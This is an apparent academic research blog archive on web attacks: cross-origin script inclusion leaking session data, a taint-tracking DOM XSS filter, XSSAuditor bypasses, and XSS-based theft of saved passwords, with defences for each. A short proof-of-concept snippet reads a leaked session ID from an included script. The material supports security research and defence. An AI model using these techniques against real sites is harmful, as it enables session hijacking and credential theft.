Category Archives: Research

Abusing JavaScript Inclusions to Leak Sensitive Data Across Domains

For our upcoming paper, The Unexpected Dangers of Dynamic JavaScript (PDF here), we analyzed a lesser-known vulnerability which is caused by the handling of cross-origin JavaScript in the browser. While normally, access to data which is hosted by an external site is prohibited by the Same-Origin Policy, the inclusion of third-party content is intentionally possible (think about including jQuery from their CDN). In this post, we will describe the problem and discuss some of the results of our study.

Cross-Origin Script Inclusion

As stated before, the inclusion of script content is somewhat exempt from the protection of the Same-Origin Policy. While a script running at may not gain access to the content of any files located on (given that does not use CORS), it may include a script which is hosted on said domain. Whenever a script is included from a third-party site, it inherits the origin of the including page, i.e., gains full access to the including page’s DOM and JavaScript global object, but more importantly, registers all its own global variables in the context of the including page. Important to note in this instance is the fact that when the browser conducts the corresponding request to, it also sends all cookies belonging to That means, if the user is logged in to that site and the content of the script is generated on-the-fly depending on the specific user (identified by his cookies), the response may leak sensitive information.

We consider the following example, which is derived from a real-world vulnerability we discovered in our study.

// located at
var username="ben";
var sessionid="10265ed845634413e490432d951d00f0";

In this case, the intention is to register the username and the sessionid for an application which is hosted by This script, however, is not properly protected against inclusion from another domain. Therefore, the attacker simply puts the following snippet into his Web page, resulting in the victim’s browser conducted an authenticated request towards the target domain.

function leaked() {
  alert("I know your sessionid for " + sessionid);
<script src="" onload="leaked"></script>

This way, if the victim visiting is currently logged in to, the attacker will be able to retrieve the sensitive session information and, thus, steal the user’s session.

Our Empirical Study

To gain insight into the actual prevalence of such flaws on the Web, we conducted a study on 150 highly ranked pages which allowed us to register a user account. On a total of 49 domains, we found evidence of dynamic generation of the JavaScript code on the server side, using the provided cookies to identify the user.

In the simplest case, we were only able to identify the Login State of a user, i.e., whether he is logged in to the page or not. While this does not yet leak much information, it might provide a phisher with valuable intel on his target: knowing specifically on which sites a user has accounts increases the chances of a successful phishing attacker. We found that 49 domains had at least one issues related to this information leak.

In addition to the knowledge whether a user actual has an account, we also discovered numerous sites which leaked unique identifiers, such as email addresses or user IDs for a specific site. This allows an attacker to easily track his victim and identify him accordingly. 34 domains in our data set leaked such a unique ID.

Next to these, we found that 15 domains leaked personal data of the victim, such as the full name, date of birth or his location (according to the stored settings for the vulnerable application). Additionally, we found a site which leaked the email senders and subjects of the last 10 emails and another one which allowed to us extract all calendar entries for the victim.

Last, and most interesting, we found that 7 domains actually leaked session information. Among this information were both session IDs to be used with the application as well as CSRF protection tokens, which allowed us to attack the vulnerable application in a second stage. In one case, we could abuse this leaked CSRF token to store a Cross-Site Scripting payload for the victim. That domain also incorporated a login using the Facebook API. The combination of the leaked CSRF token and the XSS flaw (only exploitable due to the leaked CSRF token) allowed to us craft a payload which would steal the Facebook API token. This in turn enabled us to interact with the user’s Facebook account as if we were the actually application, reading personal information and even posting in the name of the victimized user.

Screen Shot 2015-05-26 at 23.57.17Screen Shot 2015-05-26 at 23.58.09


This kind of attack is enabled by the fact that the SOP does not apply to script inclusions from remote hosts. If you are an application developers who wants to use such external scripts, extra care must be taken. First and foremost, it is not necessarily a good idea to put user-specific data into scripts with known URLs. As we have shown, this may lead to really weird situations in which your Facebook access is abused by an attacker. If possible, separate your code and data. Data is secure from being in this manner if contained in inline scripts. However, these should not be used as the Content Security Policy forbids them by default (and for a good reason). We therefore propose that the application should only put the code into includable scripts, but never data. Instead, an application should use XmlHttpRequests with CORS to fetch the user-specific data from the server. This mechanism is secure by default and can be configured to allow data access from specified third-party hosts if need be.

Using the Referer header for security is also not a good idea. This header may be stripped by an attacker (see koto’s post on the subject) and then? If you use strict Referer checking, you must decline such a request. However, there are certain proxies which strip the Referer header for privacy reasons. In these cases, the application will certainly break. In our study, we also found a number of sites which conducted Referer checking. However, if we forcefully omitted the header, those sites would serve the content as a fallback, making the application vulnerable again.

If you cannot use a strict separation between code and data, you should fall back to good old CSRF tokens. Not unlike their protection capabilities with respect to CSRF attacks, unguessable tokens as part of the script’s URL stop an attacker from including the correct URL, thus stopping his attack.


In summary, we found a high number of sites which are susceptible to attacks using dynamically generated JavaScript. The attacks range from simple login oracles, stealing sensitive data such as calendar entries to an XSS attack, enabled by a leaked CSRF token, which allowed us to interact with the victim’s Facebook account. Additionally, we found a session hijacking flaw which enabled us to fully interact with the target application in the name of the user. In a side note, we found a flaw on one bank’s site which enabled an attacker to steal the victim’s credit card information and learn his current account balance.

We are currently in the process of notifying sites of the problems. When the issues have been fixed and the site owners agree, we will provide more in-depth explanations of the exploitable apps and the corresponding proof of concept exploits.

Summary of our paper for USENIX Sec ’14 on a new DOM-based XSS filter

Things leading up to this point (and obligatory cat picture)

cat_shoe_cutAs discussed in our previous post, our research has shown that while the XSSAuditor in Chrome is able to catch quite a few exploits targeting server-side reflected XSS, it is also prone to being bypassed in situations where the attacker does not need to inject full script tags. One of the underlying problems that the Auditor has to face is the fact that it has no idea how the user-provided data (i.e. the GET or POST parameters) is used on the server side. The strategy therefore is to approximate the flow of data by finding matching pieces that exist both in request and response.

As shown for our BlackHat talk (which is partially taken from the USENIX paper), the Auditor can be bypassed on about 80% of all domains which carry a DOM-based XSS vulnerability. The reasons for that are spread all across the board – from vulnerabilities targeting eval (the Auditor works on HTML, not on JavaScript), via innerHTML (Auditor is off for performance reasons) to issues related to string matching (where the flow of data can no longer be approximated with high certainty).

Before we really get started on our paper, let’s quickly recap our work for CCS 2013. There is a longer post on the topic, but for the sake of this post, let’s briefly summarise: In order to detect DOM-based XSS in a large number of sites, we modified Chromium’s JavaScript engine V8 and rendering engine WebKit (now Blink) such that strings can carry taint information, i.e. we can at all times precisely determine where a given character in a string originated from. Rather than just saying that a given char is coming from an untrusted source, the engine allows us to pinpoint the source (such as the URL, cookies, postMessage, …). Using this precise taint information, we logged all calls to sinks such as document.write and eval and built an exploit generator to verify the vulnerabilities. The exploit generator takes in the string, its taint information and the URL of the page the flow had occurred and subsequently modifies the URL such that our verification function is called (i.e. breaks out of the existing HTML or JavaScript context and executes our function).

Our proposed filter approach

Let’s look at how the Auditor works in slightly more detail. It is located inside the HTML parser and tries to determine snippets of HTML (either tags or attributes) that lead to JavaScript execution. As an example, when it encounters a script tag, it searches the URL for a matching snippet (actually, only up to 100 chars and only until certain patterns, such as //). If one is, the script’s content is set to an empty string, therefore stopping the execution of the injected payload.

Before we go into detail on our filter, let’s briefly abstract what a Cross-Site Scripting attack is. We argue that it actually is an attack in which the attacker provides data to an application. Since the application does not properly sanitize the data, at some point it ends up being interpreted as code. In general, this is the case for all injection attacks (think about SQL injections or command injections).

Our notion in this is slightly different. Seeing that there are numerous ways around the Auditor which are related to both positioning and string matching, we propose that a filter capable of defending against DOM-based XSS should not be located in the HTML parser – but rather inside the JavaScript engine. If the JavaScript parser is able to determine the exact source information for each string it parses, it is able to check that user-provided data is only interpreted as data and never as code. Speaking in JavaScript terms, we want the user-provided data to end up being a Numeric, String or Boolean Literal, but never to be an Identifier or Punctuator. This approach is dependent on one important requirement: exact source information for each character in the parsed string.

Luckily, we had implement the biggest part of that already for CCS! The changes for the current paper mostly required persisting taint deeper into the rendering engine as well as to patch others JavaScript-based parsers, such as the JSON parser. After having done that, we extended classes used inside the JavaScript parser to allow for carrying of taint. Albeit these changes sound slim, they did require a lot of engineering. Different to CCS, where we were only interested in the flow of data to a sink such as eval or document.write, we now needed the taint information deep inside the JavaScript parser.

Also, in order to ensure that an attacker could not inject a script tag pointing to a remote URL (where all the code contained in the response would be untainted), we implemented rules in the HTML parser that did not allow tainted protocols or domains for such scripts. Similarly, we implemented checks in the DOM API that forbid assignment to such dangerous sinks with tainted values.

Evaluation of our approach

After having designed and implemented our filter, we needed to check it for three criteria: false negatives (i.e. not catching exploits), false positives (i.e. blocking legitimate sites) and performance. As discussed, we had a  large number of vulnerabilities to begin with, so evaluating the false negatives was straight forward: turn off the XSSAuditor to ensure that there was no interference and then revisit all verified vulnerable pages with our attack payload. To no big surprise, all exploits were caught. To evaluate the false positives, we conducted another crawl of the Alexa Top10k, this time enabling our filter and report function. The latter would always generate and send back a report of blocked JavaScript execution to our backend server to allow for offline analysis of the block. Operating under the notion that the links contained in the crawled sites usually do not carry an XSS payload, we initially assume that any block is a false positive. In the following, we will go over the results of that crawl.

Blocking legitimate sites

In our compatibility crawl, we analyzed a total of 981,453 URLs, consisting of 9,304,036 frames. The following table shows the results of our crawl, the percentages being relative to the number of frames and total domains crawled, respectively.

bLOCKING COMPONENT Documents DOmains exploitable DOMAINS
JavaScript 5,979 (0.064%) 50 (0,5%) 22
HTML Parser 8,805 (0.095%) 73 (0.73%) 60
DOM API 182 (0.002%) 60 (0.60%) 8
SUM 14,966 (0.016%) 183 (1.83%) 90

As the table clearly shows, there are a number of documents that use programming paradigms which are potentially insecure, such as passing user-provided JSON to eval. In some cases, the flows only occur when a certain criteria is matched. As an example, Google applies a regular expression to JSON-like input to verify that only JSON is passed and an attack is not possible. Interestingly enough, about half of all the domains on which we found policy-violation (our proposed policy, that is) usage of user-provided data could be exploited in exactly those blocked flows. Depending on the definition of a false positive –  blockage of a secure component or blockage of any component – this cuts down our FP rate to 0.9% with respect to the domains we analysed. More importantly, blocking of a single functionality does not mean that the page is no longer usable – it rather means that a single component does not function as intended.

To allow pages that properly check the provided data before passing it to eval to continue using this pattern, our prototyped implementation supports and explicit untainting API. Calling untaint() on a string will return a completely taint-free version of the string. While this sounds dangerous in terms of an attacker being able to untaint a string, he is faced with a bootstrapping problem: in order to call the untaint function, he first has to execute his own code – which is blocked by our filter.


The last piece of the puzzle is the performance of the filter. Obviously, the added code causes additional operations that need to be carried out and thus, adds some overhead. The following figure shows the results of running the well-known benchmarks Kraken, Dromaeo, Sunspider and Octane against a vanilla Chromium, our patched version as well as Firefox and IE as comparisons. Note that since strings in these benchmarks do not originate from tainted sources, “Patched Chrome” depicts the overhead that occurs if no string is tainted (just by the added logic and memory overhead), whereas “Patched Chrome (worst)” assumes every string to be tainted to give an upper bound of the overhead.



Summarizing the results of the benchmark, our implementation adds about 7 to 17% overhead. This leaves us miles in front of IE and still faster than Firefox. We do believe that additional performance can be gained quite easily. V8 draws much of its superior speed from using assembler macros rather than C++ code to get “the easy path” on certain functions such as substrings. Changing these is, however, more error-prone which is why we opted to always jump of out the ASM code into the runtime when handling tainted strings. Extending the taint-passing logic into the ASM space would – in our minds – significantly improve the performance of our approach.


Since we wrote the conclusion already for the paper, let’s just c&p it here:

In this paper we presented the design, implementation and thorough evaluation of a client-side countermeasure which is capable to precisely and robustly stop DOM-based XSS attacks. Our mechanism relies on the combination of a taint-enhanced JavaScript engine and taint-aware parsers which block the parsing of attacker-controlled syntactic content. Existing measures, such as the XSS Auditor, are still valuable to combat XSS in cases that are out of scope of our approach, namely XSS which is caused by vulnerable data flows that traverse the server.

In case of client-side vulnerabilities, our approach reliably and precisely detects injected syntactic content and, thus, is superior in blocking DOM-based XSS. Although our current implementation induces a runtime overhead between 7 and 17%, we believe that an efficient native integration of our approach is feasible. If adopted, our technique would effectively lead to an extinction of DOM-based XSS and, thus, significantly improve the security properties of the Web browser overall.


Slides and Whitepaper of our BlackHat talk

cat5In previous research, we found a large number of DOM-based Cross-Site Scripting vulnerabilities across the Alexa Top 5k. Continuing this research, we crawled the Alexa Top 10k and again found XSS of ~10% of the sites we visited. In order to verify the vulnerabilities, we turned off the XSSAuditor which is built into Chrome – in our notion, a vulnerability should be treated as such regardless of whether the filter in one browser catches it or not.

That being said, after the initial verification, we analysed how many of our exploits triggered even with the Auditor activated. Obviously these numbers were lower than the initial results, thus we tried to determine the reason for some exploits passing and some not passing. This led to a full-fledged analysis of the Auditor in which we discovered numerous bypasses that are related to both implementational decisions as well as conceptual issues such as the placement of the Auditor.

In our BlackHat talk, we presented these bypasses motivated from real-world examples of DOM-based XSS, showing that over 80% of all domains we discovered vulnerabilities on were prone to filter bypasses. Go ahead and check out the slides as well as our whitepaper.

Summary of our AsiaCCS paper on implementing a password manager which protects users against XSS attackers

Much of our work focusses on Cross-Site Scripting vulnerabilities. These vulnerabilities are often used by an attacker to steal authentication data such as session cookies and subsequently use the service in the name of his victim. However, we identified another attack in which abusing a XSS vulnerability might come in handy for an attacker: automatically stealing passwords from the victim’s password managers.

Underlying security issue

The scenario in this case is quite straight forward. As discussed by Mozilla’s Justin Dolske, password managers work in a simple manner. Whenever a user enters his credentials into a login form and subsequently posts it, the browser’s password manager is invoked and prompts the user to agree to storing of these credentials. When the user later comes back to the same login page, the password manager scans the document to determine where the login form is and if it is found, automatically fills out the credentials previously stored. This however comes with inherent security issues attached to it since the credentials are inserted into the document, and thus are accessible via the Document Object Model (or short DOM). The DOM is an API that enables JavaScript to interact with the document, allowing JavaScript to read and modify the document’s structure as it wishes.

Automatically attacking password managers

This is precisely where the Cross-Site Scripting attacker comes into play. The attack is conducted in three steps (which is also shown in the figure below):

  1. The attacker injects a form with a username and password field into the vulnerability document.
  2. The password manager detects the form and automatically (as discussed above) inserts the credentials into the fields.
  3. In the final step, the attacker’s injected code uses the DOM to retrieve the username and password and subsequently sends both back to the attacker’s server.


Factors for the success of these attacks

The degree to which an attack on vulnerable pages can be automatically conducted depends on multiple implementational details. In our work, we identified five of these factors:

  1.  URL matching: The first factor we identified was whether password managers check the URL of the form they insert credentials into. If credentials are merely stored alongside the origin (protocol, domain and port) of the page they were entered into, a XSS vulnerability on a document on said domain is sufficient for an attacker to mount the attack previously described. If the exact URL is stored, the attacker still has the option to either load the login page in a frame or open a popup with it. If the password managers inserts credentials in these viewports, the attacker can still retrieve the data, as the Same-Origin Policy is fulfilled and thus, access between frames is permitted.
  2. Form matching: The second factor we found is form matching, i.e., if the password manager stores the structure and/or the form’s target. This mainly is relevant for simple automation since an attacker could potentially attack a number of different domains with a minimal form (consisting only of two input fields, one text and one password field). Regardless, an attacker might also choose to build a form that perfectly matches the original one in a targeted attack against a given site.
  3. Autofilling frames: as discussed for URL matching, an attacker is capable of loading the login page in a frame if strict URL matching is employed. However, if a password manager refuses to insert credentials into forms inside frames, the attacker has to open a popup, thus loosing a certain amount of stealthiness in his attack. Apart from that, autofilling into frames makes automation much easier since the attacker can include multiple frames on a site under his control to retrieve the password data from many domains at a time.
  4. User interaction: one show stopper is obviously user interaction. If a password manager requires user interaction, attacks cannot be automated or at least require some form of social engineering for the victim to click on the corresponding “insert credentials” button.
  5. Autocomplete attribute: The autocomplete attribute was recently added with HTML5 and according to the spec, setting it to the “off keyword indicates […] that the control’s input data is particularly sensitive “. Thus, whenever a browser encounters such an attribute, it should not offer to store the sensitive data that was entered into the fields. (Quoting the WhatWG wiki: “Otherwise, the user agent should not remember the control’s value, and should not offer past values to the user.”). If however this is ignored in storing the credentials and only observed when inserting the stored data, an attacker is able to craft a form of his own with autocomplete=”on” for all fields and thus steal the secret data.

Analyzing the current generation of built-in password managers

With the aforementioned factors in mind, we conducted an analysis of six browsers, namely Chrome 31, Internet Explorer 11, Firefox 25, Opera 18, Safari 7 and the Maxthon Cloud Browser (version 3). Although the latter might not be as well-known as the rest, it is offered to users installing the latest versions of Windows when asked for their browser choice. Hence, we chose to include it in our analysis. The results of the analysis are shown in the following table:

Browser URL matching form matching Autofilling frames User interaction Autocomplete attribute
Chrome 31 No No Yes No partially
IE 11 Yes No No Yes Yes
Firefox 25 No No Yes No Yes
Opera 18 No No Yes No partially
Safari 3 No No Yes No Yes
Maxthon 3 No No Yes No No

As we see, the only browser that performs URL matching is Microsoft’s Internet Explorer, whereas the worst-case example is Maxthon. The browser only stores the second-level domain along with the credentials, meaning that a XSS on a given sub-domain, even with a different protocol and port, is sufficient to steal the passwords. IE is the most secure with respect to autofilling frames and user interaction as well. Most interestingly are the findings related to the autocomplete attribute in Chrome and Safari. We found that if just one field of a form has the autocomplete attribute not set to “off”, the credentials are stored. Although they are not automatically inserted into the field afterwards (in these cases, autocomplete is adhered to), this allows an attacker to craft his own form and trick the password manager into filling out the form.

This shows that there in most browsers, attacks against the password manager are easily achieved. Apart from Internet Explorer, none of our test subjects required user interaction or did URL matching of any sort.

Our proposed solution

The underlying cause for the attack we described earlier is the fact that password managers are implemented such that they insert credentials into forms (and the DOM) where they can be accessed by JavaScript. Although this is desirable for Web developers, it allows an XSS attacker to steal the stored credentials.

Looking at this, we see a mismatch in the notion of what a password manager should do (i.e. aid the user in the authentication process)  and what is does (i.e. insert credentials into forms). We therefore propose to align notion and implementation of passwords to protect them from automated, XSS-based attacks.

Inserting the passwords into fields is unnecessary, since they are typically only needed when the login request is sent to the server. Our approach therefore aims at doing just that. The following figure outlines the current implementation (upper part) and our proposed solution.

Instead of inserting the password into the corresponding field, our implementation only inserts a nonce into the password field. This nonce may be accessed by the attacker since it is completely independent of the password that was originally stored. When the request is sent to the server, our prototype (built as a Firefox extension) detects the nonce and replaces it with the actual password. Thus, the stored password is sent to the server but not accessible by JavaScript. We also apply restrictions, namely strict matching of the target URL (so the attacker cannot send the credentials to his own server) as well as only replacing the nonce in POST parameters (such that an attacker may not ascertain the password by determining the URL the data sent to. In GET requests, all parameters are appended to the URL and thus might leak the password).

Functional evaluation

To prove that our approach is sound, we conducted an analysis of password fields on the Alexa Top 4,000. We used natural language to determine the location of logins (such as the keywords “login” or “sign in” in the links contained on the entry page). In total, we found 2,143 domains with login fields. Although we are sure that is number is not the complete amount of pages which have a login field within the top 4,000 domains, we believe that it is a sufficiently large data set. In our analysis, we found that 325 domains use JavaScript to access the password field and some manner. Manual analysis showed that out of these, 96 domains took the field inputs and sent them to a server using XHRs. Out of these, we found

  • 23 domains that hashes the password field’s input before sending it to the server,
  • 1 domain that applied base64 encoding on the password
  • and 6 domains which  use GET requests to send the data to the server.

The remaining domains only checked whether data was present in the fields before posting the form and thus do not cause incompatibilities with our proposed solution. With respect to the data set we see that only 30 out of 2,143 domains are incompatible with our approach, amounting to an incompatibility rate of just 1,4%.  We therefore believe that adoption is feasible, as we have shown with our proof of concept implementation for Firefox.